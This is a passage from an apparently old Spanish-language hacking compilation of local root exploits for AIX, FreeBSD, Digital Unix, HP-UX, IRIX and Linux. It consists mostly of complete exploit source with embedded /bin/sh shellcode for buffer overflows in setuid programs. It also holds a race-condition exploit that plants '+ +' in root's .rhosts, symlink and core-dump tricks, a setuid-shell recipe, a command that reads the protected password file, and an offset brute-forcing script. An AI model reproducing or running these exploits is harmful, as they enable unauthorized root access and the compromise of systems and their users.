  8156. 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  8157. 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  8158. 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  8159. 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  8160. 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  8161. 0x7c0903a6 , 0x4e800420, 0x0
  8162. };
  8163. /* disassembly
  8164. 7c0802a6        mfspr   r0,LR
  8165. 9421fbb0        stu     SP,-1104(SP) --get stack
  8166. 90010458        st      r0,1112(SP)
  8167. 3c60f019        cau     r3,r0,0xf019
  8168. 60632c48        lis     r3,r3,11336
  8169. 90610440        st      r3,1088(SP)
  8170. 3c60d002        cau     r3,r0,0xd002
  8171. 60634c0c        lis     r3,r3,19468
  8172. 90610444        st      r3,1092(SP)
  8173. 3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  8174. 6063696e        lis     r3,r3,26990
  8175. 90610438        st      r3,1080(SP)
  8176. 3c602f73        cau     r3,r0,0x2f73
  8177. 60636801        lis     r3,r3,26625
  8178. 3863ffff        addi    r3,r3,-1
  8179. 9061043c        st      r3,1084(SP) --terminate with 0
  8180. 30610438        lis     r3,SP,1080
  8181. 7c842278        xor     r4,r4,r4    --argv=NULL
  8182. 80410440        lwz     RTOC,1088(SP)
  8183. 80010444        lwz     r0,1092(SP) --jump
  8184. 7c0903a6        mtspr   CTR,r0
  8185. 4e800420        bctr              --jump
  8186. */
  8187.  
  8188. #define MAXBUF 600
  8189. unsigned int buf[MAXBUF];
  8190. unsigned int frame[MAXBUF];
  8191. unsigned int i,nop,mn=100;
  8192. int max=280;
  8193. unsigned int toc;
  8194. unsigned int eco;
  8195. unsigned int *pt;
  8196. char *t;
  8197. unsigned int reta; /* return address */
  8198. int corr=3400;
  8199. char *args[4];
  8200. char *newenv[8];
  8201.  
  8202.  
  8203. if (argc>1)
  8204.         corr = atoi(argv[1]);
  8205.  
  8206. pt=(unsigned *) &execv;
  8207. toc=*(pt+1);
  8208. eco=*pt;
  8209.  
  8210. if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
  8211. {
  8212.         perror("Bad parameters");
  8213.         exit(1);
  8214. }
  8215.  
  8216. #define OO 7
  8217. *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
  8218. *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  8219. *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
  8220. *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
  8221. 0x0000ffff);
  8222.  
  8223. reta=(unsigned) &buf[0]+corr;
  8224.  
  8225. for(nop=0;nop<mn;nop++)
  8226.  buf[nop]=0x4ffffb82;
  8227. strcpy((char*)&buf[nop],(char*)&code);
  8228. i=nop+strlen( (char*) &code)/4-1;
  8229.  
  8230. if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
  8231.         || !(reta && 0xff000000))
  8232. {
  8233. perror("Return address has zero");exit(5);
  8234. }
  8235.  
  8236. while(i++<max)
  8237.  buf[i]=reta;
  8238. buf[i]=0;
  8239.  
  8240. for(i=0;i<max-1;i++)
  8241.  frame[i]=reta;
  8242. frame[i]=0;
  8243.  
  8244. /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
  8245. newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  8246. newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  8247. newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  8248. newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  8249. newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  8250. newenv[5]=createvar("HOME",(char*)&frame[0]);
  8251. newenv[6]=NULL;
  8252.  
  8253. args[0]=prog2;
  8254. puts("Start...");/*Here we go*/
  8255. execve(prog,args,newenv);
  8256. perror("Error executing execve \n");
  8257. /*      Georgi Guninski guninski@hotmail.com
  8258.         http://www.geocities.com/ResearchTriangle/1711*/
  8259. }
  8260.  
  8261. /*
  8262. -brute-script----------------------------------------------------------
  8263. #!/bin/ksh
  8264. L=200
  8265. O=40
  8266. while [ $L -lt 12000 ]
  8267. do
  8268. echo $L
  8269. L=`expr $L + 96`
  8270. ./a.out $L
  8271. done
  8272. */
  8273.  
  8274. ------------ FIN -------------------------------------------------------------
  8275.  
  8276.   OTRO PARA AIX
  8277.  
  8278. ------------ Codigo Fuente ---------------------------------------------------
  8279.  
  8280.         Existe una vulnerabilidad en el comando lquerypv de AIX. no estoy
  8281.   seguro de la version.
  8282.  
  8283.   /usr/sbin/lquerypv -h /etc/security/passwd
  8284.  
  8285.         Puedes sustituir /etc/security/passwd por cualquier otro fichero que
  8286.   no podamos leer (que no tengamos permiso de lectura por no ser r00t).
  8287.  
  8288. ------------ FIN -------------------------------------------------------------
  8289.  
  8290.   FREEBSD
  8291.  
  8292. ------------ Codigo Fuente ---------------------------------------------------
  8293.  
  8294. #include <stdio.h>
  8295. #include <stdlib.h>
  8296. #include <unistd.h>
  8297.  
  8298. #define DEFAULT_OFFSET        50
  8299. #define BUFFER_SIZE        256
  8300.  
  8301. long get_esp(void)
  8302. {
  8303.    __asm__("movl %esp,%eax\n");
  8304. }
  8305.  
  8306. main(int argc, char **argv)
  8307. {
  8308.    char *buff = NULL;
  8309.    unsigned long *addr_ptr = NULL;
  8310.    char *ptr = NULL;
  8311.  
  8312. /* so you dont have to disassemble it, here is the asm code:
  8313. start:
  8314. jmp     endofk0dez
  8315. realstart:
  8316. popl    %esi
  8317. leal    (%esi), %ebx
  8318. movl    %ebx, 0x0b(%esi)
  8319. xorl    %edx, %edx
  8320. movl    %edx, 7(%esi)
  8321. movl    %edx, 0x0f(%esi)
  8322. movl    %edx, 0x14(%esi)
  8323. movb    %edx, 0x19(%esi)
  8324. xorl    %eax, %eax
  8325. movb    $59, %al
  8326. leal    0x0b(%esi), %ecx
  8327. movl    %ecx, %edx
  8328. pushl   %edx
  8329. pushl   %ecx
  8330. pushl   %ebx
  8331. pushl   %eax
  8332. jmp     bewm
  8333. endofk0dez:
  8334. call    realstart
  8335. .byte   '/', 'b', 'i', 'n', '/', 's', 'h'
  8336. .byte   1, 1, 1, 1
  8337. .byte   2, 2, 2, 2
  8338. .byte   3, 3, 3, 3
  8339. bewm:
  8340. .byte   0x9a, 4, 4, 4, 4, 7, 4
  8341. */
  8342.    
  8343.    char execshell[] =
  8344.    "\xeb\x23"
  8345.    "\x5e"
  8346.    "\x8d\x1e"
  8347.    "\x89\x5e\x0b"
  8348.    "\x31\xd2"
  8349.    "\x89\x56\x07"
  8350.    "\x89\x56\x0f"
  8351.    "\x89\x56\x14"
  8352.    "\x88\x56\x19"
  8353.    "\x31\xc0"
  8354.    "\xb0\x3b"
  8355.    "\x8d\x4e\x0b"
  8356.    "\x89\xca"
  8357.    "\x52"
  8358.    "\x51"
  8359.    "\x53"
  8360.    "\x50"
  8361.    "\xeb\x18"
  8362.    "\xe8\xd8\xff\xff\xff"
  8363.    "/bin/sh"
  8364.    "\x01\x01\x01\x01"
  8365.    "\x02\x02\x02\x02"
  8366.    "\x03\x03\x03\x03"
  8367.    "\x9a\x04\x04\x04\x04\x07\x04";
  8368.    
  8369.    int i;
  8370.    int ofs = DEFAULT_OFFSET;
  8371.  
  8372.    /* if we have a argument, use it as offset, else use default */
  8373.    if(argc == 2)
  8374.       ofs = atoi(argv[1]);   
  8375.    /* print the offset in use */
  8376.    printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
  8377.    
  8378.    buff = malloc(4096);
  8379.    if(!buff)
  8380.    {
  8381.       printf("can't allocate memory\n");
  8382.       exit(0);
  8383.    }
  8384.    ptr = buff;
  8385.    /* fill start of buffer with nops */
  8386.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  8387.    ptr += BUFFER_SIZE-strlen(execshell);
  8388.    /* stick asm code into the buffer */
  8389.    for(i=0;i < strlen(execshell);i++) 
  8390.       *(ptr++) = execshell[i];
  8391.    /* write the return addresses
  8392.    **
  8393.    ** return address                4
  8394.    ** ebp                    4
  8395.    ** register unsigned n            0
  8396.    ** register char *cp                0
  8397.    ** register struct syment *s            0
  8398.    **
  8399.    ** total: 8
  8400.    */
  8401.    addr_ptr = (long *)ptr;
  8402.    for(i=0;i < (8/4);i++)
  8403.       *(addr_ptr++) = get_esp() + ofs;
  8404.    ptr = (char *)addr_ptr;
  8405.    *ptr = 0;
  8406.    execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL);
  8407. }
  8408.  
  8409. ------------ FIN -------------------------------------------------------------
  8410.  
  8411.   FREEBSD
  8412.  
  8413. ------------ Codigo Fuente ---------------------------------------------------
  8414.  
  8415. There is a BSD exploit that works on the termcap file. it has some entries
  8416. like this.
  8417.  
  8418.  telnet> env def TERM access
  8419.  telnet> env def TERMCAP /path/and/name/of/uploaded/file
  8420.  telnet> open victim.host.com
  8421.  
  8422. and the source code is here:
  8423. --------SNIP-----
  8424.  
  8425. #include <stdlib.h>
  8426. #include <unistd.h>
  8427. #include <fcntl.h>
  8428.  
  8429. #define filename "./termcap"
  8430. #define entry   "access|Gimme r00t:\\\n :"
  8431. #define bufsize 1300
  8432. #define default_offset 870    /* Should work...*/
  8433.  
  8434. char shellcode[] =
  8435.    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  8436.    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  8437.    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  8438.    "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";
  8439.  
  8440. long get_sp(void)
  8441. {
  8442.    __asm__("movl %esp, %eax\n");
  8443. }
  8444.  
  8445. int main(int argc, char *argv[]) {
  8446.    int i, fd, offs;
  8447.    long *bof_ptr;
  8448.    char *ptr, *buffer, *tempbuf;
  8449.  
  8450.    offs = default_offset;
  8451.  
  8452.    if(argc == 2) {
  8453.       printf("using offset: %d\n",atoi(argv[1]));
  8454.       offs = atoi(argv[1]);
  8455.    }
  8456.  
  8457.    if(!(buffer = malloc(bufsize))) {
  8458.       printf("can't allocate enough memory\n");
  8459.       exit(0);
  8460.    }
  8461.  
  8462.  
  8463.   if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
  8464.       printf("can't allocate enough memory\n");
  8465.       exit(0);
  8466.    }
  8467.  
  8468.    bof_ptr = (long *)buffer;
  8469.    for (i = 0; i < bufsize - 4; i += 4)
  8470.       *(bof_ptr++) = get_sp() - offs;
  8471.  
  8472.    ptr = (char *)buffer;
  8473.    for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
  8474.       *(ptr++) = 0x90;
  8475.  
  8476.    for (i = 0; i < strlen(shellcode); i++)
  8477.       *(ptr++) = shellcode[i];
  8478.  
  8479.    printf("Creating termcap file\n");
  8480.  
  8481.    snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry,
  8482. buffer);
  8483.    fd = open(filename, O_WRONLY|O_CREAT, 0666);
  8484.    write (fd, tempbuf, strlen(tempbuf));
  8485.    close(fd);
  8486. }
  8487.  
  8488. ------------ FIN -------------------------------------------------------------
  8489.  
  8490.   DIGITAL CON DBX
  8491.  
  8492. ------------ Codigo Fuente ---------------------------------------------------
  8493.  
  8494. If you run dbx (tested on 3.11.10) on a setuid root program that you have read
  8495. access to, the program will core dump and create a root owned 600 perm core 
  8496. in the current directory. You might have to run dbx one or two times to get it
  8497. to work.. The message you are looking for is:
  8498.  
  8499. dbx version 3.11.10
  8500. Type 'help' for help.
  8501.  
  8502. warning: /bin/crontab has no symbol table -- very little is supported
  8503. without it
  8504.  
  8505. Could not attach to process 10112
  8506.  
  8507. cannot run program
  8508. Exiting due to error during startup
  8509.  
  8510. Now, this core dump will follow symlinks.. and using the trick mentioned
  8511. earlier with embedding + + in a core dump, you can easily grab root.
  8512.  
  8513. ln -s /.rhosts core
  8514. BOB42="
  8515.  
  8516. + +
  8517.  
  8518. "
  8519. export BOB42
  8520. dbx /bin/crontab
  8521. rsh -l root localhost /bin/sh -i
  8522.  
  8523. ------------ FIN -------------------------------------------------------------
  8524.  
  8525.   HP-UX
  8526.  
  8527. ------------ Codigo Fuente ---------------------------------------------------
  8528.  
  8529. /***
  8530.  *
  8531.  * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
  8532.  *
  8533.  * This bug is exhibited in all versions of HP-UX that contain
  8534.  * /usr/etc/vhe/vhe_u_mnt setuid to root.
  8535.  *
  8536.  * This program written by pluvius@io.org
  8537.  * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
  8538.  *
  8539.  * I found that the exploit code didn't always work due to a race between
  8540.  * the child and the parent, and that a link() called failed due to
  8541.  * the fact that user directories and the /tmp are in different file systems
  8542.  * so you must create a symlink.
  8543.  * I added in a call to alarm() so that the timing between the two processes
  8544.  * is ok..
  8545.  *
  8546.  ***/
  8547. #include <stdio.h>
  8548. #include <stdlib.h>
  8549. #include <pwd.h>
  8550. #include <string.h>
  8551. #include <unistd.h>
  8552. #include <signal.h>
  8553. #include <netdb.h>
  8554. #include <sys/wait.h>
  8555. #include <sys/stat.h>
  8556. #include <sys/utsname.h>
  8557.  
  8558. #define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
  8559. #define NAME "<defunct>"
  8560.  
  8561. int test_host()
  8562. { struct utsname name;
  8563.    uname(&name);
  8564.    return !strcmp(name.sysname,"HP-UX");
  8565. }
  8566. int check_mount()
  8567. { struct stat my_buf;
  8568.    if (stat(BUGGY_PROG, &my_buf))
  8569.       return 0;
  8570.    return !((my_buf.st_mode & S_ISUID) != S_ISUID);
  8571. }
  8572. void pause_handler()
  8573. {
  8574.    signal(SIGALRM,pause_handler);
  8575. }
  8576. int rhost_user(user)
  8577. char *user;
  8578. {
  8579.   struct passwd *info;
  8580.   char   homedir[80];
  8581.   int fd[2];
  8582.   int procno;
  8583.   struct stat my_buf;
  8584.   int fsize;
  8585.  
  8586.    info = getpwnam(user);
  8587.    if (info==NULL) {
  8588.       fprintf(stderr,"ERROR: Unknown user %s\n",user);
  8589.       exit(-3);
  8590.    }
  8591.    strcpy(homedir,info->pw_dir);
  8592.    if (homedir[strlen(homedir)-1] != '/')
  8593.       strcat(homedir,"/");
  8594.    strcat(homedir,".rhosts");
  8595.  
  8596.    signal(SIGALRM,pause_handler);
  8597.    memset(my_buf,0,sizeof(my_buf));
  8598.    stat(homedir,&my_buf);
  8599.    fsize = my_buf.st_size;
  8600.  
  8601.   /* now the exploit code... slightly modified.. but mostly from the source */
  8602.   /* by misar@rbg.informatik.th-darmstadt.de                                */
  8603.    pipe(fd);
  8604.    if (!(procno=fork())) {
  8605.       close(0);
  8606.       dup(fd[0]);
  8607.       close(fd[1]);
  8608.       close(1);
  8609.       close(2);
  8610.       alarm(2); /* wait for other process */
  8611.       nice(5);
  8612.       execl(BUGGY_PROG,NAME,NULL);
  8613.    } else {
  8614.     FILE *out;
  8615.     char listfile[25];
  8616.     char mntfile[25];
  8617.     struct stat dummy;
  8618.  
  8619.       close(1);
  8620.       dup(fd[1]);
  8621.       close(fd[0]);
  8622.       write(1,"+\n",2);
  8623.       sprintf(listfile,"/tmp/vhe_%d",procno+2);
  8624.       sprintf(mntfile,"/tmp/newmnt%d",procno+2);
  8625.       while (stat(listfile,&dummy));
  8626.       unlink(listfile);
  8627.       out=fopen(listfile,"w");
  8628.       fputs("+ +\n",out);
  8629.       fclose(out);
  8630.       unlink(mntfile);
  8631.       symlink(homedir,mntfile);
  8632.       waitpid(procno,NULL,0);
  8633.    }
  8634.    stat(homedir,&my_buf);
  8635.    return (fsize != my_buf.st_size);
  8636. }
  8637.  
  8638. void main(argc,argv)
  8639. int   argc;
  8640. char *argv[];
  8641. {
  8642.   int i;
  8643.   int rhost_root = 0;
  8644.   char userid[10];
  8645.  
  8646.    if (!test_host()) {
  8647.       fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
  8648.       exit(-1);
  8649.    }
  8650.  
  8651.    if (!check_mount()) {
  8652.       fprintf(stderr,
  8653.               "ERROR: %s must exist and be setuid root to exploit this bug\n",
  8654.               BUGGY_PROG);
  8655.       exit(-2);
  8656.    }
  8657.  
  8658.    for (i=0;(i<5)&&(!rhost_root);i++) {
  8659.       fprintf(stderr,"Attempting to .rhosts user root..");
  8660.       if (!rhost_user("root")) {
  8661.          fprintf(stderr,"failed.\n");
  8662.       } else {
  8663.          fprintf(stderr,"succeeded\n");
  8664.          rhost_root = 1;
  8665.       }
  8666.    }
  8667.  
  8668.    if (!rhost_root) {
  8669.       /* failed to rhost root, try user 'bin' */
  8670.       fprintf(stderr,"Too many failures.. trying user bin...");
  8671.       if (!rhost_user("bin")) {
  8672.          fprintf(stderr,"failed.\n");
  8673.          exit(-4);
  8674.       }
  8675.       fprintf(stderr,"succeeded.\n");
  8676.       strcpy(userid,"bin");
  8677.    } {
  8678.       strcpy(userid,"root");
  8679.    }
  8680.    fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
  8681.            userid);
  8682. }
  8683.  
  8684. ------------ FIN -------------------------------------------------------------
  8685.  
  8686.   OTRO PARA HP
  8687.  
  8688. ------------ Codigo Fuente ---------------------------------------------------
  8689.  
  8690. /* SOD /usr/diag/bin/[cm]stm buffer overflow */
  8691.  
  8692. main()
  8693. {
  8694. char buf[500];
  8695.  
  8696. strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20
  8697. \x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x0
  8698. 8\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x
  8699. 43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\
  8700. x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x4
  8701. 3\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x
  8702. 43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\
  8703. x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x4
  8704. 3\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x
  8705. 43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\
  8706. x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x4
  8707. 3\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x4
  8708. 4\x44\x44\x7b\x03\x30\x1b");
  8709.  
  8710. execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
  8711. /* Either-or, same overflow */
  8712. execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
  8713. }
  8714.  
  8715. ------------ FIN -------------------------------------------------------------
  8716.  
  8717.   IRIX 6.2-6.3
  8718.  
  8719. ------------ Codigo Fuente ---------------------------------------------------
  8720.  
  8721. Irix buffer overflow in /usr/bin/X11/xlock
  8722. The exploit as posted works on Irix 6.3. To get it to work on 6.2,
  8723. either change OFFSET from 0x118 to 0x160, or pass the program '20' as a
  8724. parameter.
  8725.  
  8726. Note that the shell spawned as a result of this exploit has uid=0,
  8727. euid=youruserid. To make your euid=0 you'll need a program like the
  8728. following:
  8729.  
  8730. void main(void)
  8731. {
  8732.     setuid(0,0);
  8733.     execl("/bin/sh", "sh", 0);
  8734. }
  8735.  
  8736. Regards,
  8737.  
  8738.  David Hedley (hedley@cs.bris.ac.uk)
  8739.  
  8740. ------------------- cut here -------------------------
  8741.  
  8742. /* /usr/bin/X11/xlock exploit by DCRH 25/5/97
  8743.  *
  8744.  * Tested on: R5000 O2 (Irix 6.3)
  8745.  *            R8000 Power Challenge (Irix64 6.2)
  8746.  *
  8747.  * For Irix 6.2, change OFFSET to 0x160, or pass '20' as a parameter
  8748.  *
  8749.  * Exploit doesn't work on Irix 5.x due to stack position
  8750.  *
  8751.  * compile as: cc -n32 xlock.c
  8752.  */
  8753.  
  8754. #include <stdio.h>
  8755. #include <stdlib.h>
  8756. #include <string.h>
  8757. #include <sys/types.h>
  8758. #include <unistd.h>
  8759.  
  8760. #define NUM_ADDRESSES   800
  8761. #define BUF_LENGTH      80
  8762. #define EXTRA           190
  8763. #define OFFSET          0x118    /* 0x160 for Irix 6.2 */
  8764. #define GP_OFFSET       32472
  8765. #define IRIX_NOP        0x03e0f825    /* move $ra,$ra */
  8766.  
  8767. #define u_long unsigned
  8768.  
  8769. u_long get_sp_code[] = {
  8770.     0x03a01025,         /* move $v0,$sp         */
  8771.     0x03e00008,         /* jr $ra               */
  8772.     0x00000000,         /* nop                  */
  8773. };
  8774.  
  8775. u_long irix_shellcode[] = {
  8776.     0x24041234,         /* li $4,0x1234         */
  8777.     0x2084edcc,         /* sub $4,0x1234        */
  8778.     0x0491fffe,         /* bgezal $4,pc-4       */
  8779.     0x03bd302a,         /* sgt $6,$sp,$sp       */
  8780.     0x23e4012c,         /* addi $4,$31,264+36   */
  8781.     0xa086feff,         /* sb $6,-264+7($4)     */
  8782.     0x2084fef8,         /* sub $4,264           */
  8783.     0x20850110,         /* addi $5,$4,264+8     */
  8784.     0xaca4fef8,         /* sw $4,-264($5)       */
  8785.     0xaca6fefc,         /* sw $4,-260($5)       */
  8786.     0x20a5fef8,         /* sub $5, 264          */
  8787.     0x240203f3,         /* li $v0,1011          */
  8788.     0x03ffffcc,         /* syscall 0xfffff      */
  8789.     0x2f62696e,         /* "/bin"               */
  8790.     0x2f7368ff,         /* "/sh"                */
  8791. };
  8792.  
  8793. char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
  8794.  
  8795. void main(int argc, char **argv)
  8796. {
  8797.     char *env[] = {NULL};
  8798.     u_long targ_addr, stack, tmp;
  8799.     u_long *long_p;
  8800.     int i, code_length = strlen((char *)irix_shellcode)+1;
  8801.     u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
  8802.  
  8803.     stack = get_sp();
  8804.  
  8805.     if (stack & 0x80000000) {
  8806.         printf("Recompile with the '-32' option\n");
  8807.         exit(1);
  8808.     }
  8809.  
  8810.     long_p =(u_long *)  buf;
  8811.     targ_addr = stack + OFFSET;
  8812.  
  8813.     if (argc > 1)
  8814.         targ_addr += atoi(argv[1]) * 4;
  8815.  
  8816.     if (targ_addr + GP_OFFSET > 0x80000000) {
  8817.         printf("Sorry - this exploit for Irix 6.x only\n");
  8818.         exit(1);
  8819.     }
  8820.  
  8821.     tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & 
  8822. ~3;
  8823.  
  8824.     while ((tmp & 0xff000000) == 0 ||
  8825.            (tmp & 0x00ff0000) == 0 ||
  8826.            (tmp & 0x0000ff00) == 0 ||
  8827.            (tmp & 0x000000ff) == 0)
  8828.         tmp += 4;
  8829.  
  8830.     for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
  8831.         *long_p++ = tmp;
  8832.  
  8833.     for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  8834.         *long_p++ = IRIX_NOP;
  8835.  
  8836.     for (i = 0; i < code_length/sizeof(u_long); i++)
  8837.         *long_p++ = irix_shellcode[i];
  8838.  
  8839.     tmp = (targ_addr + GP_OFFSET + 32/* + NUM_ADDRESSES/2 */) & ~3;
  8840.  
  8841.     for (i = 0; i < EXTRA / sizeof(u_long); i++)
  8842.         *long_p++ = (tmp << 16) | (tmp >> 16);
  8843.  
  8844.     *long_p = 0;
  8845.  
  8846.     printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
  8847.  
  8848.     execle("/usr/bin/X11/xlock", "xlock", "-name", buf, 0, env);
  8849.     perror("execl failed");
  8850. }
  8851.  
  8852. ------------ FIN -------------------------------------------------------------
  8853.  
  8854.   IRIX 5.3-6.2
  8855.  
  8856. ------------ Codigo Fuente ---------------------------------------------------
  8857.  
  8858. PROBLEM. systour
  8859. AFFECTS. SGI IRIX 5.3 and 6.2 with the systour package available.
  8860. REQUIRED. account on server
  8861. RISK. root compromise, denial of service, etc.
  8862.  
  8863. ---
  8864.  
  8865. Exploit:
  8866. irst, we set up an environment for running inst. dryrun is set to true
  8867. because we are considerate environmentalists.
  8868.  
  8869. $ rbase=$HOME; export rbase
  8870. $ mkdir -p $HOME/var/inst
  8871. $ echo "dryrun: true" > $HOME/.swmgrrc
  8872.  
  8873. These three lines should be very familiar to all exploitors.
  8874.  
  8875. $ cp -p /bin/sh /tmp/foobar
  8876. $ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
  8877. $ chmod a+x $HOME/var/inst/.exitops
  8878.  
  8879. Now run it.
  8880.  
  8881. $ /usr/lib/tour/bin/RemoveSystemTour
  8882. Executing outstanding exit-commands from previous session ..
  8883. Successfully completed exit-commands from previous session.
  8884. Reading installation history
  8885. Checking dependencies
  8886. ERROR : Software Manager: automatic installation failed: New target
  8887. (nothing installed) and no distribution.
  8888.  
  8889. ---
  8890.  
  8891. DISCUSSION. The easiest solution is to replace RemoveSystemTour with
  8892. a binary that checks the password. However, RemoveSystemTour may not be
  8893. the only way to access inst, and so these general recommendations apply:
  8894.  
  8895. inst should check UID and lock configuration options when called non-
  8896. interactively from versions and with euid 0. inst also has a race
  8897. condition on the file /tmp/shPID0, the shell script it creates to make the
  8898. appropriate directory (rbase). inst should verify the variables it
  8899. uses--by relying on an external shell script, environment variables, IFS,
  8900. etc. can be tampered with. Finally, inst will happily overwrite logfiles
  8901. specified in the .swmgrrc file and creat() the shell script over anything.
  8902.  
  8903. ------------ FIN -------------------------------------------------------------
  8904.  
  8905.   LINUX (pongo varios ya que hay muchos ...)
  8906.  
  8907. ------------ Codigo Fuente ---------------------------------------------------
  8908.  
  8909. /*
  8910.  
  8911.    Just Your Standard EGGSHELL Proggie:
  8912.    traceroute buffer overflow exploit for RedHat Linux 5.0
  8913.    mostly ripped from Aleph One <aleph1@underground.org>
  8914.    Wilton Wong
  8915.  
  8916.    wwong@blackstar.net
  8917.  
  8918.    gcc -o trace_shell trace_shell.c
  8919.  
  8920. */
  8921.  
  8922. #include <stdlib.h>
  8923.  
  8924. #define DEFAULT_OFFSET                 0
  8925. #define DEFAULT_BUFFER_SIZE            1019
  8926. #define DEFAULT_EGG_SIZE               2048
  8927. #define NOP                            0x90
  8928.  
  8929. char shellcode[] =
  8930.         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  8931.         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  8932.         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  8933.  
  8934. unsigned long get_sp(void) {
  8935.  
  8936.    __asm__("movl %esp,%eax");
  8937. }
  8938.  
  8939. void main(int argc, char *argv[]) {
  8940.   char *buff, *ptr, *egg;
  8941.   long *addr_ptr, addr;
  8942.   int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  8943.   int i, eggsize=DEFAULT_EGG_SIZE;
  8944.   if (argc > 1) bsize  = atoi(argv[1]);
  8945.   if (argc > 2) offset = atoi(argv[2]);
  8946.   if (argc > 3) eggsize = atoi(argv[3]);
  8947.   if (!(buff = malloc(bsize))) {
  8948.     printf("Can't allocate memory.\n");
  8949.     exit(0);
  8950.   }
  8951.   if (!(egg = malloc(eggsize))) {
  8952.     printf("Can't allocate memory.\n");
  8953.     exit(0);
  8954.   }
  8955.   addr = get_sp() - offset;
  8956.   printf("Using address: 0x%x\n", addr);
  8957.   ptr = buff;
  8958.   addr_ptr = (long *) ptr;
  8959.   for (i = 0; i < bsize; i+=4)
  8960.     *(addr_ptr++) = addr;
  8961.   ptr = egg;
  8962.   for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
  8963.     *(ptr++) = NOP;
  8964.   for (i = 0; i < strlen(shellcode); i++)
  8965.     *(ptr++) = shellcode[i];
  8966.   buff[bsize - 1] = '\0';
  8967.   egg[eggsize - 1] = '\0';
  8968.   memcpy(egg,"EGG=",4);
  8969.   putenv(egg);
  8970.   memcpy(buff,"RET=",4);
  8971.   putenv(buff);
  8972.   printf("Now run: /usr/sbin/traceroute $RET\n");
  8973.   system("/bin/bash");
  8974. }
  8975.  
  8976. ------------ FIN -------------------------------------------------------------
  8977.  
  8978.   Ahora uno para SLACKWARE:
  8979.  
  8980. ------------ Codigo Fuente ---------------------------------------------------
  8981.  
  8982. /*
  8983.   SLACKWARE Traceroute Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 
  8984. 1997
  8985.   Created: 8/15/97
  8986.  
  8987.   Give thanks to Solar Designer for his su overflow, this is based
  8988.   on that peice of work.
  8989.  
  8990.   This is for educational purposes only, in no way am I responsible 
  8991.   for what you do with this.  This should be used by sys admins, or
  8992.   people who have permission of the admin to run it to see if this
